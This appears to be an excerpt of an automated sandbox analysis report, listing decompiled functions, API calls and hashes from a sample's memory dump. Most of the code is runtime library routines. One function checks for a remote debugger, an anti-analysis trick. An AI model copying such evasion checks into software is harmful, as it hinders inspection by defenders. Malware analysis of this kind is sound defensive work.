Instruction Fuzzy Hash: D2012171900284BFDB10EFB6ECC9E9B7BBCEB4C700F00043AE106DA152D6789545CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00438418, Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043842A
FindCloseChangeNotification.KERNEL32(00000000), ref: 00438436

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ChangeCloseFindHeapNotificationProcess
String ID:
API String ID: 1865124440-0
Opcode ID: 9d410a4fcdc46e13a70cbc1fb8008168aaa8605b2d415dbfde2a2061b727874b
Instruction ID: f5427a212dfdd87da89f9e0ba9ca1222acfb2865482f63687b35125f38c6985d
Opcode Fuzzy Hash: 9d410a4fcdc46e13a70cbc1fb8008168aaa8605b2d415dbfde2a2061b727874b
Instruction Fuzzy Hash: E5E02032F142341ECB1029757F4C7A77659D3C6175F141B36FD16D2481FC29451581ED

Uniqueness

Uniqueness Score: -1.00%

Function 0049C76F, Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,0049C931,?,00000022,00000000,00000002,?,?,0049AC90,00000000,00000000,00000004,00499A05,00000000,00000004), ref: 0049C791
GetLocaleInfoW.KERNEL32(00000000,00000000,00000004,?,?,?,0049C931,?,00000022,00000000,00000002,?,?,0049AC90,00000000,00000000), ref: 0049C79C

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8bdeb88323b82ef23c73d34e39c01d7ba77247a1ae46e5c06d95754e11bfc369
Instruction ID: f9ffe4a80a61b845b6a4f6b8d3eda22fdacd91f8600eba3c745f3679840f9bd8
Opcode Fuzzy Hash: 8bdeb88323b82ef23c73d34e39c01d7ba77247a1ae46e5c06d95754e11bfc369
Instruction Fuzzy Hash: 7DE0E636501129ABCF011FD1ED49CAE7F29EB447607044465F90556121DB3598219F99

Uniqueness

Uniqueness Score: -1.00%

Function 00438DCE, Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 00438DE5
CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 00438DEC

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CheckCurrentDebuggerPresentProcessRemote
String ID:
API String ID: 3244773808-0
Opcode ID: 329cb82f05bf82990bf6ada7289953a8f0a9763c03fb8bedf75985b71777df28
Instruction ID: 09e9f4d8f5242797316c51bba627f5ea0253f9dfdebc91d532508e0e4eafc2c5
Opcode Fuzzy Hash: 329cb82f05bf82990bf6ada7289953a8f0a9763c03fb8bedf75985b71777df28
Instruction Fuzzy Hash: 0AE0BF71910208AFCB04DFE5D849A9E7BF8EB48255F404469A402D3241DA78AA54CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0049ACC4, Relevance: 30.3, APIs: 20, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0049ACC4(void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				signed int _t65;
				signed char _t66;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t86;
				intOrPtr* _t88;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr* _t94;
				void* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				void* _t111;
				signed int _t116;
				void* _t117;
				void* _t146;
				signed int _t150;
				intOrPtr _t152;
				void* _t154;
				intOrPtr* _t156;
				void* _t157;
				void* _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t164;
				void* _t165;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;

				_t176 = __eflags;
				_t153 = __esi;
				_t146 = __edx;
				_push(8);
				L0049D90B(0x4d731a, __edi, __esi);
				_push(0);
				_push(0);
				_t65 = L00499AE3(_t146, __edi, __esi, _t176);
				_t116 =  *(_t164 + 0x14);
				_t152 =  *((intOrPtr*)(_t164 + 0x10));
				_t150 = 1 << _t65 >> 1;
				_t177 =  *(_t164 + 0xc) & 1;
				if(( *(_t164 + 0xc) & 1) != 0) {
					_t110 = E0042B22E(0x4ede30, _t152, __esi, _t177);
					if(_t116 != 0) {
						_push(_t116);
						_t153 = _t110;
						_t111 = E00499534(_t152, _t153, __eflags);
						_push(_t153);
						_push(_t111);
						_push(_t152);
						E0048A873(_t150, _t152, _t153, __eflags);
						_t165 = _t165 + 0x10;
					} else {
						 *((intOrPtr*)(_t164 - 0x10)) = _t110;
						_t163 = E0049CE33(0x10);
						 *((intOrPtr*)(_t164 - 0x14)) = _t163;
						_t179 = _t163;
						if(_t163 == 0) {
							_t153 = 0;
							__eflags = 0;
						} else {
							 *(_t163 + 4) =  *(_t163 + 4) & _t116;
							 *_t163 = 0x402e64;
							 *((intOrPtr*)(_t163 + 8)) = L0049C860();
							 *(_t163 + 0xc) = _t150;
						}
						_push( *((intOrPtr*)(_t164 - 0x10)));
						_push(_t153);
						_push(_t152);
						E0048A873(_t150, _t152, _t153, _t179);
						_t165 = _t165 + 0xc;
					}
				}
				_t66 =  *(_t164 + 0xc);
				_t180 = _t66 & 0x00000020;
				if((_t66 & 0x00000020) != 0) {
					_t153 = E0042B22E(0x4ede34, _t152, _t153, _t180);
					if(_t116 != 0) {
						_push(_t116);
						_t106 = E004995C9();
						_push(_t153);
						_push(_t106);
						_push(_t152);
						E0048A873(_t150, _t152, _t153, __eflags);
						_t165 = _t165 + 0x10;
					} else {
						_t108 = E0049CE33(8);
						 *((intOrPtr*)(_t164 - 0x14)) = _t108;
						_t182 = _t108;
						if(_t108 == 0) {
							_t108 = 0;
							__eflags = 0;
						} else {
							 *(_t108 + 4) =  *(_t108 + 4) & _t116;
							 *_t108 = 0x402e80;
						}
						_push(_t153);
						_push(_t108);
						_push(_t152);
						E0048A873(_t150, _t152, _t153, _t182);
						_t165 = _t165 + 0xc;
					}
					_t66 =  *(_t164 + 0xc);
				}
				_t183 = _t66 & 0x00000004;
				if((_t66 & 0x00000004) != 0) {
					_t157 = E0042B22E(0x4ede38, _t152, _t153, _t183);
					if(_t116 != 0) {
						_push(_t116);
						_t80 = E0049965E();
						_push(_t157);
						_push(_t80);
						_push(_t152);
						E0048A873(_t150, _t152, _t157, __eflags);
						_t82 = E0042B22E(0x4ede3c, _t152, _t157, __eflags);
						_push(_t116);
						_t83 = E004996F3();
						_push(_t82);
						_push(_t83);
						_push(_t152);
						E0048A873(_t150, _t152, _t82, __eflags);
						_t85 = E0042B22E(0x4ede40, _t152, _t82, __eflags);
						_push(_t116);
						_t86 = L0049981D();
						_push(_t85);
						_push(_t86);
						_push(_t152);
						E0048A873(_t150, _t152, _t85, __eflags);
						_t88 = E0042B22E(0x4ede44, _t152, _t85, __eflags);
						_push(_t116);
						_t153 = _t88;
						_t89 = E00499788();
						_push(_t88);
						_push(_t89);
						_push(_t152);
						E0048A873(_t150, _t152, _t88, __eflags);
						_t165 = _t165 + 0x40;
					} else {
						_t91 = E0049CE33(8);
						 *((intOrPtr*)(_t164 - 0x14)) = _t91;
						_t185 = _t91;
						if(_t91 == 0) {
							_t91 = 0;
							__eflags = 0;
						} else {
							 *(_t91 + 4) =  *(_t91 + 4) & _t116;
							 *_t91 = 0x402e9c;
						}
						_push(_t157);
						_push(_t91);
						_push(_t152);
						E0048A873(_t150, _t152, _t157, _t185);
						_t173 = _t165 + 0xc;
						_t160 = E0042B22E(0x4ede3c, _t152, _t157, _t185);
						_t94 = E0049CE33(8);
						 *((intOrPtr*)(_t164 - 0x14)) = _t94;
						_t186 = _t94;
						if(_t94 == 0) {
							_t94 = 0;
							__eflags = 0;
						} else {
							 *(_t94 + 4) =  *(_t94 + 4) & 0x00000000;
							 *_t94 = 0x402eb4;
						}
						_push(_t160);
						_push(_t94);
						_push(_t152);
						E0048A873(_t150, _t152, _t160, _t186);
						_t174 = _t173 + 0xc;
						 *((intOrPtr*)(_t164 - 0x10)) = E0042B22E(0x4ede40, _t152, _t160, _t186);
						_t161 = E0049CE33(0x58);
						 *((intOrPtr*)(_t164 - 0x14)) = _t161;
						 *(_t164 - 4) = 7;
						_t187 = _t161;
						if(_t161 == 0) {
							_t161 = 0;
							__eflags = 0;
						} else {
							 *((intOrPtr*)(_t161 + 4)) = 0;
							_push(0);
							_push( *((intOrPtr*)(_t164 + 8)));
							 *(_t164 - 4) = 8;
							 *_t161 = 0x402ecc;
							 *((char*)(_t161 + 0x28)) = 0;
							L0049AB98(_t161, _t152, _t161, _t187);
							 *_t161 = 0x402f00;
						}
						_push( *((intOrPtr*)(_t164 - 0x10)));
						 *(_t164 - 4) =  *(_t164 - 4) | 0xffffffff;
						_push(_t161);
						_push(_t152);
						E0048A873(_t150, _t152, _t161, _t187);
						_t175 = _t174 + 0xc;
						 *((intOrPtr*)(_t164 - 0x10)) = E0042B22E(0x4ede44, _t152, _t161, _t187);
						_t162 = E0049CE33(0x58);
						 *((intOrPtr*)(_t164 - 0x14)) = _t162;
						 *(_t164 - 4) = 0xd;
						_t188 = _t162;
						if(_t162 == 0) {
							_t153 = 0;
							__eflags = 0;
						} else {
							 *(_t162 + 4) =  *(_t162 + 4) & 0x00000000;
							_push(0);
							_push( *((intOrPtr*)(_t164 + 8)));
							 *(_t164 - 4) = 0xe;
							 *_t162 = 0x402ecc;
							 *((char*)(_t162 + 0x28)) = 1;
							L0049AB98(_t162, _t152, _t162, _t188);
							 *_t162 = 0x402f34;
						}
						_push( *((intOrPtr*)(_t164 - 0x10)));
						 *(_t164 - 4) =  *(_t164 - 4) | 0xffffffff;
						_push(_t153);
						_push(_t152);
						E0048A873(_t150, _t152, _t153, _t188);
						_t165 = _t175 + 0xc;
					}
					_t66 =  *(_t164 + 0xc);
				}
				_t189 = _t66 & 0x00000010;
				if((_t66 & 0x00000010) != 0) {
					_t154 = E0042B22E(0x4ede48, _t152, _t153, _t189);
					if(_t116 != 0) {
						_push(_t116);
						_t69 = L004998B2();
						_push(_t154);
						_push(_t69);
						_push(_t152);
						E0048A873(_t150, _t152, _t154, __eflags);
						_t71 = E0042B22E(0x4ede4c, _t152, _t154, __eflags);
						_push(_t116);
						_t72 = L00499947();
						_push(_t71);
						_push(_t72);
						_push(_t152);
						_t66 = E0048A873(_t150, _t152, _t71, __eflags);
					} else {
						_t73 = E0049CE33(0x44);
						 *((intOrPtr*)(_t164 - 0x14)) = _t73;
						 *(_t164 - 4) = 0x12;
						_t191 = _t73;
						if(_t73 == 0) {
							_t74 = 0;
							__eflags = 0;
						} else {
							_push(_t116);
							_push( *((intOrPtr*)(_t164 + 8)));
							_t74 = E004999DC(_t73); // executed
						}
						 *(_t164 - 4) =  *(_t164 - 4) | 0xffffffff;
						_push(_t154);
						_push(_t74);
						_push(_t152);
						E0048A873(_t150, _t152, _t154, _t191);
						_t117 = E0042B22E(0x4ede4c, _t152, _t154, _t191);
						_t156 = E0049CE33(0xc);
						 *((intOrPtr*)(_t164 - 0x14)) = _t156;
						_t192 = _t156;
						if(_t156 == 0) {
							_t156 = 0;
							__eflags = 0;
						} else {
							 *(_t156 + 4) =  *(_t156 + 4) & 0x00000000;
							 *_t156 = 0x402f94;
							 *(_t156 + 8) =  *(_t156 + 8) & 0x00000000;
							E0049AC9B(_t117, _t152,  *((intOrPtr*)(_t164 + 8))); // executed
						}
						_push(_t117);
						_push(_t156);
						_push(_t152);
						_t66 = E0048A873(_t150, _t152, _t156, _t192);
					}
				}
				return L0049D8D4(_t66);
			}

0x0049acc4
0x0049acc4
0x0049acc4
0x0049acc4
0x0049accb
0x0049acd0
0x0049acd2
0x0049acd4
0x0049acd9
0x0049acde
0x0049ace8
0x0049acea
0x0049aced
0x0049acf4
0x0049acfb
0x0049ad38
0x0049ad39
0x0049ad3b
0x0049ad40
0x0049ad41
0x0049ad42
0x0049ad43
0x0049ad48
0x0049acfd
0x0049acff
0x0049ad07
0x0049ad09
0x0049ad0d
0x0049ad0f
0x0049ad27
0x0049ad27
0x0049ad11
0x0049ad11
0x0049ad14
0x0049ad1f
0x0049ad22
0x0049ad22
0x0049ad29
0x0049ad2c
0x0049ad2d
0x0049ad2e
0x0049ad33
0x0049ad33
0x0049acfb
0x0049ad4b
0x0049ad4e
0x0049ad50
0x0049ad5c
0x0049ad60
0x0049ad8b
0x0049ad8c
0x0049ad91
0x0049ad92
0x0049ad93
0x0049ad94
0x0049ad99
0x0049ad62
0x0049ad64
0x0049ad69
0x0049ad6d
0x0049ad6f
0x0049ad7c
0x0049ad7c
0x0049ad71
0x0049ad71
0x0049ad74
0x0049ad74
0x0049ad7e
0x0049ad7f
0x0049ad80
0x0049ad81
0x0049ad86
0x0049ad86
0x0049ad9c
0x0049ad9c
0x0049ad9f
0x0049ada1
0x0049adb1
0x0049adb5
0x0049aed3
0x0049aed4
0x0049aed9
0x0049aeda
0x0049aedb
0x0049aedc
0x0049aee9
0x0049aeee
0x0049aef1
0x0049aef6
0x0049aef7
0x0049aef8
0x0049aef9
0x0049af06
0x0049af0b
0x0049af0e
0x0049af13
0x0049af14
0x0049af15
0x0049af16
0x0049af23
0x0049af28
0x0049af29
0x0049af2b
0x0049af30
0x0049af31
0x0049af32
0x0049af33
0x0049af38
0x0049adbb
0x0049adbd
0x0049adc2
0x0049adc6
0x0049adc8
0x0049add5
0x0049add5
0x0049adca
0x0049adca
0x0049adcd
0x0049adcd
0x0049add7
0x0049add8
0x0049add9
0x0049adda
0x0049addf
0x0049adee
0x0049adf0
0x0049adf5
0x0049adf9
0x0049adfb
0x0049ae09
0x0049ae09
0x0049adfd
0x0049adfd
0x0049ae01
0x0049ae01
0x0049ae0b
0x0049ae0c
0x0049ae0d
0x0049ae0e
0x0049ae13
0x0049ae22
0x0049ae2a
0x0049ae2d
0x0049ae30
0x0049ae37
0x0049ae39
0x0049ae60
0x0049ae60
0x0049ae3b
0x0049ae3d
0x0049ae40
0x0049ae41
0x0049ae46
0x0049ae4a
0x0049ae50
0x0049ae53
0x0049ae58
0x0049ae58
0x0049ae62
0x0049ae65
0x0049ae69
0x0049ae6a
0x0049ae6b
0x0049ae70
0x0049ae7f
0x0049ae87
0x0049ae8a
0x0049ae8d
0x0049ae94
0x0049ae96
0x0049aebe
0x0049aebe
0x0049ae98
0x0049ae98
0x0049ae9c
0x0049ae9e
0x0049aea3
0x0049aea7
0x0049aead
0x0049aeb1
0x0049aeb6
0x0049aeb6
0x0049aec0
0x0049aec3
0x0049aec7
0x0049aec8
0x0049aec9
0x0049aece
0x0049aece
0x0049af3b
0x0049af3b
0x0049af3e
0x0049af40
0x0049af50
0x0049af54
0x0049afd0
0x0049afd1
0x0049afd6
0x0049afd7
0x0049afd8
0x0049afd9
0x0049afe6
0x0049afeb
0x0049afee
0x0049aff3
0x0049aff4
0x0049aff5
0x0049aff6
0x0049af56
0x0049af58
0x0049af5e
0x0049af61
0x0049af68
0x0049af6a
0x0049af79
0x0049af79
0x0049af6c
0x0049af6c
0x0049af6d
0x0049af72
0x0049af72
0x0049af7b
0x0049af7f
0x0049af80
0x0049af81
0x0049af82
0x0049af96
0x0049af9d
0x0049af9f
0x0049afa3
0x0049afa5
0x0049afc1
0x0049afc1
0x0049afa7
0x0049afa7
0x0049afb0
0x0049afb6
0x0049afba
0x0049afba
0x0049afc3
0x0049afc4
0x0049afc5
0x0049afc6
0x0049afcb
0x0049af54
0x0049b003

APIs

__EH_prolog3.LIBCMT ref: 0049ACCB
collate.LIBCPMT ref: 0049ACD4

Part of subcall function 00499AE3: __EH_prolog3_GS.LIBCMT ref: 00499AEA
Part of subcall function 00499AE3: __Getcoll.LIBCPMT ref: 00499B4E

__Getcoll.LIBCPMT ref: 0049AD1A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AD2E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AD43
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AD81
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AD94
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049ADDA
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AE0E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AEC9
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AEDC
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AEF9
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AF16
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AF33
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AE6B

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

numpunct.LIBCPMT ref: 0049AF72
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AF82
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AFC6
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AFD9
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049AFF6

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollH_prolog3_Lockitstd::_$H_prolog3Lockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 3839405195-0
Opcode ID: 318ce5f481af8421ded7a6ab4392a14e205fc520f5932919b53e51d8f1db25ff
Instruction ID: 04a7dbbcce0daef4041963a70b1bcc221a47aead397dd6f57fe9782455da5912
Opcode Fuzzy Hash: 318ce5f481af8421ded7a6ab4392a14e205fc520f5932919b53e51d8f1db25ff
Instruction Fuzzy Hash: 8691C5B1D002116AEF117AA6884AA3F7EA5DF51754F10893FF809A7282DB7C8D1153EF

Uniqueness

Uniqueness Score: -1.00%

Function 004C2051, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E004C2051(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = L004C1DB4(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = L004BCBD1(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t122 = E004C1D1F(); // executed
						_t252 = _t122;
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								L004BCB1A(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x4ee718 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = L004C1AD2(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x4ee718 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E004C1D1F();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x4ee718 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E004A9638(GetLastError());
											 *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											L004BCCE3( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = L004C1F30(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E004B70C8(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E004A9638(_t270);
							 *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x4ee718 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E004A966E())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x4ee718 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E004A9638(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E004C1D1F();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E004A965B()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E004A966E())) = 0x18;
						goto L2;
					}
				} else {
					 *(E004A965B()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E004A966E()));
				}
			}

0x004c2074
0x004c2078
0x004c2079
0x004c2079
0x004c2079
0x004c207b
0x004c2081
0x004c209c
0x004c20a1
0x004c20a4
0x004c20a6
0x004c20a8
0x004c20c7
0x004c20ce
0x004c20d5
0x004c20d8
0x004c20e4
0x004c20e7
0x004c20ef
0x004c20f0
0x004c20f3
0x004c20f3
0x004c20f5
0x004c20fa
0x004c20fc
0x004c20ff
0x004c2107
0x004c210a
0x004c2177
0x004c2178
0x004c217e
0x004c2180
0x004c21c9
0x004c21cc
0x004c21d5
0x004c21d8
0x004c21db
0x004c21dd
0x004c21dd
0x004c21dd
0x004c21ce
0x004c21d1
0x004c21d1
0x004c21e2
0x004c21e5
0x004c21f1
0x004c21f6
0x004c2202
0x004c220c
0x004c2210
0x004c221a
0x004c221d
0x004c2228
0x004c222d
0x004c223d
0x004c2240
0x004c2244
0x004c2245
0x004c224b
0x004c2250
0x004c2253
0x004c2255
0x004c2257
0x004c225c
0x004c225f
0x004c2261
0x004c228b
0x004c22af
0x004c22b3
0x004c22b7
0x004c22b9
0x004c22bd
0x004c22bf
0x004c22c9
0x004c22cc
0x004c22d3
0x004c22d3
0x004c22d3
0x004c22d3
0x004c22bd
0x004c22d8
0x004c22e4
0x004c22e6
0x004c2371
0x004c2371
0x00000000
0x004c22ec
0x004c22ec
0x004c22f0
0x00000000
0x00000000
0x004c22f5
0x004c2307
0x004c230f
0x004c2312
0x004c2313
0x004c2316
0x004c231d
0x004c2322
0x004c2325
0x004c2359
0x004c2363
0x004c2363
0x004c236d
0x00000000
0x004c236d
0x004c232e
0x004c2347
0x004c234e
0x004c2171
0x00000000
0x004c2171
0x004c22e6
0x004c2263
0x00000000
0x004c222f
0x004c2236
0x004c2239
0x004c223b
0x004c2265
0x004c2267
0x00000000
0x004c226d
0x00000000
0x004c223b
0x004c222d
0x004c2188
0x004c218b
0x004c21a6
0x004c21ab
0x004c21b1
0x004c21b3
0x004c21be
0x004c21be
0x00000000
0x004c21b3
0x004c210c
0x004c2113
0x004c2115
0x004c214c
0x004c214c
0x004c2156
0x004c2159
0x004c2160
0x004c2160
0x004c2160
0x004c216c
0x00000000
0x004c216c
0x004c2117
0x004c211b
0x00000000
0x00000000
0x004c211d
0x004c212c
0x004c2131
0x004c2134
0x004c2135
0x004c2138
0x004c2138
0x004c213f
0x004c2141
0x004c2144
0x004c2147
0x004c214a
0x00000000
0x00000000
0x00000000
0x004c20aa
0x004c20af
0x004c20b2
0x004c20b9
0x00000000
0x004c20b9
0x004c2083
0x004c2088
0x004c208e
0x004c2090
0x00000000
0x004c2095

APIs

Part of subcall function 004C1D1F: CreateFileW.KERNEL32(00000000,00000000,?,004C20FA,?,?,00000000,?,004C20FA,00000000,0000000C), ref: 004C1D3C

GetLastError.KERNEL32 ref: 004C2165
__dosmaperr.LIBCMT ref: 004C216C
GetFileType.KERNEL32(00000000), ref: 004C2178
GetLastError.KERNEL32 ref: 004C2182
__dosmaperr.LIBCMT ref: 004C218B
CloseHandle.KERNEL32(00000000), ref: 004C21AB
CloseHandle.KERNEL32(?), ref: 004C22F5
GetLastError.KERNEL32 ref: 004C2327
__dosmaperr.LIBCMT ref: 004C232E

Strings

